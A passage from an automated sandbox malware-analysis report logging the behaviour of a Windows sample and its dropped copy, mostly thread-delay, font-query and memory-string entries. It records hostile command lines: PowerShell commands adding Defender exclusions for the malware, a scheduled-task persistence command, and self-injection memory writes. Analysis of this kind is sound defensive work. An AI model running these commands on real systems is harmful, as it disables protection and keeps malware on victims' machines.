            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 594750Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 594578Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 594402Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 594281Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 594172Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 594063Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 593953Jump to behavior
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 600000
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 599820
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 599702
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 599593
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 599484
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 599375
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 599266
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 599155
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 599047
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 598938
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 598813
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 598688
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 598563
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 598453
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 598344
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 598219
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 598110
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 597985
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 597860
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 597735
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 597610
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 597485
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 597117
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 597000
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 596891
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 596766
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 596654
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 596547
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 596438
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 596313
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 596188
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 596078
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 595969
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 595844
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 595732
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 595625
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 595516
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 595406
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 595297
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 595180
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 595063
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 594953
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 594844
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 594719
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 594609
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 594500
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 594391
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 594281
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 594170
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 594063
            Source: svchost.exe, 00000007.00000002.2863398142.000002118322B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2865561936.0000021188858000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: zZlsXaceOG.exe, 0000000D.00000002.3639915641.0000000000A4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
            Source: hcy2SdW2z6.exe, 00000008.00000002.3640392209.0000000000F66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllssz
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 8_2_06A17D90 LdrInitializeThunk,8_2_06A17D90
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hcy2SdW2z6.exe"
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zZlsXaceOG.exe"
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hcy2SdW2z6.exe"Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zZlsXaceOG.exe"Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeMemory written: C:\Users\user\Desktop\hcy2SdW2z6.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeMemory written: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hcy2SdW2z6.exe"Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zZlsXaceOG.exe"Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zZlsXaceOG" /XML "C:\Users\user\AppData\Local\Temp\tmpDE83.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess created: C:\Users\user\Desktop\hcy2SdW2z6.exe "C:\Users\user\Desktop\hcy2SdW2z6.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zZlsXaceOG" /XML "C:\Users\user\AppData\Local\Temp\tmpEF6B.tmp"
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeProcess created: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe "C:\Users\user\AppData\Roaming\zZlsXaceOG.exe"
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Users\user\Desktop\hcy2SdW2z6.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Design\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Design.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
